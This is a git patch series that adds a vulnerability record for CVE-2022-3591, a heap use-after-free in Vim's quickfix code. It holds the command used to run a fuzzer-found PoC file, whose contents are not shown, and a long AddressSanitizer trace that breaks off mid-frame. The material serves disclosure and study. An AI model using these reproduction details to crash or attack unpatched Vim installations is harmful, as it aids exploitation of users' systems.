From fcc33cad117ad0b4aafa6b2f74bd9ff921e05868 Mon Sep 17 00:00:00 2001 From: Mz_zM Date: Thu, 27 Apr 2023 15:00:22 +0000 Subject: [PATCH 01/11] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-3591?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/vim/2022/CVE-2022-3591/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/vim/2022/CVE-2022-3591/.keep diff --git a/cve/vim/2022/CVE-2022-3591/.keep b/cve/vim/2022/CVE-2022-3591/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From ea47c65daf6a88852db0407ad3a4cd1a597499d5 Mon Sep 17 00:00:00 2001 From: Mz_zM Date: Thu, 27 Apr 2023 15:02:42 +0000 Subject: [PATCH 02/11] rename cve/vim/2022/CVE-2022-3591/.keep to cve/vim/2022/CVE-2022-3591/README.md. Signed-off-by: Mz_zM --- cve/vim/2022/CVE-2022-3591/{.keep => README.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cve/vim/2022/CVE-2022-3591/{.keep => README.md} (100%) diff --git a/cve/vim/2022/CVE-2022-3591/.keep b/cve/vim/2022/CVE-2022-3591/README.md similarity index 100% rename from cve/vim/2022/CVE-2022-3591/.keep rename to cve/vim/2022/CVE-2022-3591/README.md -- Gitee From ada62a2facb4a7df1b911505bb2c8d72acc5e3e1 Mon Sep 17 00:00:00 2001 From: Mz_zM Date: Thu, 27 Apr 2023 15:18:14 +0000 Subject: [PATCH 03/11] update cve/vim/2022/CVE-2022-3591/README.md. Signed-off-by: Mz_zM --- cve/vim/2022/CVE-2022-3591/README.md | 372 +++++++++++++++++++++++++++ 1 file changed, 372 insertions(+) diff --git a/cve/vim/2022/CVE-2022-3591/README.md b/cve/vim/2022/CVE-2022-3591/README.md index e69de29b..c99086d0 100644 --- a/cve/vim/2022/CVE-2022-3591/README.md +++ b/cve/vim/2022/CVE-2022-3591/README.md @@ -0,0 +1,372 @@ + **描述** +Use After Free in function qf_get_curlist at quickfix.c:1932 + +**vim 版本** + +``` +git log +commit bf72e0c67f26ea7c8fd941fdd1533c24c7b6cb43 (grafted, HEAD -> master, tag: v9.0.0792, origin/master, origin/HEAD) +``` + + **POC** + + +``` +./vim -u NONE -i NONE -n -m -X -Z -e -s -S /home/fuzz/test/poc14_huaf.dat -c :qa! +================================================================= +==147326==ERROR: AddressSanitizer: heap-use-after-free on address 0x61b00005be88 at pc 0x55f4ac3e895f bp 0x7ffe39fa57b0 sp 0x7ffe39fa57a0 +READ of size 4 at 0x61b00005be88 thread T0 + #0 0x55f4ac3e895e in qf_get_curlist /home/fuzz/vim/src/quickfix.c:1932 + #1 0x55f4ac3f4422 in qf_win_pos_update /home/fuzz/vim/src/quickfix.c:4446 + #2 0x55f4ac3f4f99 in qf_update_buffer /home/fuzz/vim/src/quickfix.c:4609 + #3 0x55f4ac3f1e4a in qf_age /home/fuzz/vim/src/quickfix.c:3902 + #4 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #5 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #6 0x55f4ac60adaa in do_ucmd /home/fuzz/vim/src/usercmd.c:1912 + #7 0x55f4ac17be2c in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2571 + #8 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #9 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #10 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #11 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #12 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #13 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #14 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #15 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #16 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #17 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #18 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #19 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #20 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #21 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #22 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #23 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #24 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #25 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #26 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #27 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #28 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #29 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #30 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #31 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #32 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #33 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #34 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #35 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #36 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #37 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #38 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #39 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #40 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #41 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #42 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #43 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #44 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #45 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #46 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #47 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #48 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #49 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #50 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #51 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #52 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #53 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #54 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #55 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #56 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #57 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #58 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #59 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #60 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #61 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #62 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #63 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #64 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #65 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #66 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #67 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #68 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #69 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #70 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #71 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #72 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #73 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #74 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #75 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #76 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #77 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #78 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #79 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #80 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #81 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #82 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #83 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #84 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #85 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #86 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #87 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #88 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #89 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #90 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #91 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #92 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #93 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #94 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #95 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #96 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #97 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #98 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #99 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #100 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #101 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #102 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #103 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #104 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #105 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #106 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #107 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #108 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #109 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #110 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #111 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #112 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #113 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #114 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #115 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #116 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #117 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #118 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #119 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #120 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #121 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #122 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #123 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #124 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #125 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #126 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #127 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #128 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #129 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #130 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #131 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #132 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #133 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #134 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #135 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #136 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #137 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #138 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #139 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #140 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #141 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #142 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #143 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #144 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #145 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #146 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #147 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #148 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #149 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #150 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #151 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #152 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #153 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #154 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #155 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #156 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #157 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #158 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #159 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #160 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #161 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #162 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #163 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #164 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #165 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #166 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #167 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #168 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #169 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #170 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #171 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #172 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #173 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #174 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #175 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #176 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #177 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #178 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #179 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #180 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #181 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #182 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #183 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #184 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #185 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #186 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #187 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #188 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #189 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #190 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #191 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #192 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #193 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #194 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #195 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #196 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #197 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #198 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #199 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #200 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #201 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #202 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #203 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #204 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #205 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #206 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #207 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #208 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #209 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #210 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #211 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #212 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #213 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #214 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #215 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #216 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #217 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #218 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #219 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #220 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #221 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #222 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #223 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #224 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #225 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #226 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #227 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #228 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #229 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #230 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #231 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #232 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #233 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #234 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #235 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #236 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #237 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #238 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #239 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #240 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #241 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #242 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #243 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #244 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #245 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #246 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #247 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #248 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #249 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #250 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + +0x61b00005be88 is located 8 bytes inside of 1464-byte region [0x61b00005be80,0x61b00005c438) +freed by thread T0 here: + #0 0x7f862ee4340f in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:122 + #1 0x55f4abfed596 in vim_free /home/fuzz/vim/src/alloc.c:615 + #2 0x55f4ac3e91ab in ll_free_all /home/fuzz/vim/src/quickfix.c:2049 + #3 0x55f4ac4023ee in qf_free_stack /home/fuzz/vim/src/quickfix.c:7714 + #4 0x55f4ac4024b6 in set_errorlist /home/fuzz/vim/src/quickfix.c:7750 + #5 0x55f4ac40612e in set_qf_ll_list /home/fuzz/vim/src/quickfix.c:8560 + #6 0x55f4ac4062a9 in f_setloclist /home/fuzz/vim/src/quickfix.c:8589 + #7 0x55f4ac111208 in call_internal_func /home/fuzz/vim/src/evalfunc.c:3049 + #8 0x55f4ac621a2d in call_func /home/fuzz/vim/src/userfunc.c:3681 + #9 0x55f4ac6181b9 in get_func_tv /home/fuzz/vim/src/userfunc.c:1841 + #10 0x55f4ac62dd32 in ex_call_inner /home/fuzz/vim/src/userfunc.c:5647 + #11 0x55f4ac62fb45 in ex_call /home/fuzz/vim/src/userfunc.c:5971 + #12 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #13 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #14 0x55f4ac001c18 in apply_autocmds_group /home/fuzz/vim/src/autocmd.c:2232 + #15 0x55f4ac000401 in apply_autocmds /home/fuzz/vim/src/autocmd.c:1710 + #16 0x55f4ac3a3fce in did_set_string_option /home/fuzz/vim/src/optionstr.c:2540 + #17 0x55f4ac399413 in set_string_option /home/fuzz/vim/src/optionstr.c:538 + #18 0x55f4ac38203f in set_option_value /home/fuzz/vim/src/option.c:4378 + #19 0x55f4ac382284 in set_option_value_give_err /home/fuzz/vim/src/option.c:4423 + #20 0x55f4ac3f61df in qf_fill_buffer /home/fuzz/vim/src/quickfix.c:4855 + #21 0x55f4ac3f4f31 in qf_update_buffer /home/fuzz/vim/src/quickfix.c:4604 + #22 0x55f4ac3f1e4a in qf_age /home/fuzz/vim/src/quickfix.c:3902 + #23 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #24 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #25 0x55f4ac60adaa in do_ucmd /home/fuzz/vim/src/usercmd.c:1912 + #26 0x55f4ac17be2c in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2571 + #27 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #28 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #29 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + +previously allocated by thread T0 here: + #0 0x7f862ee43808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 + #1 0x55f4abfed2aa in lalloc /home/fuzz/vim/src/alloc.c:246 + #2 0x55f4abfed140 in alloc_clear /home/fuzz/vim/src/alloc.c:177 + #3 0x55f4abfed1e1 in alloc_clear_id /home/fuzz/vim/src/alloc.c:193 + #4 0x55f4ac3e9cec in qf_alloc_stack /home/fuzz/vim/src/quickfix.c:2233 + #5 0x55f4ac40231d in qf_free_stack /home/fuzz/vim/src/quickfix.c:7707 + #6 0x55f4ac4024b6 in set_errorlist /home/fuzz/vim/src/quickfix.c:7750 + #7 0x55f4ac40612e in set_qf_ll_list /home/fuzz/vim/src/quickfix.c:8560 + #8 0x55f4ac4062a9 in f_setloclist /home/fuzz/vim/src/quickfix.c:8589 + #9 0x55f4ac111208 in call_internal_func /home/fuzz/vim/src/evalfunc.c:3049 + #10 0x55f4ac621a2d in call_func /home/fuzz/vim/src/userfunc.c:3681 + #11 0x55f4ac6181b9 in get_func_tv /home/fuzz/vim/src/userfunc.c:1841 + #12 0x55f4ac62dd32 in ex_call_inner /home/fuzz/vim/src/userfunc.c:5647 + #13 0x55f4ac62fb45 in ex_call /home/fuzz/vim/src/userfunc.c:5971 + #14 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #15 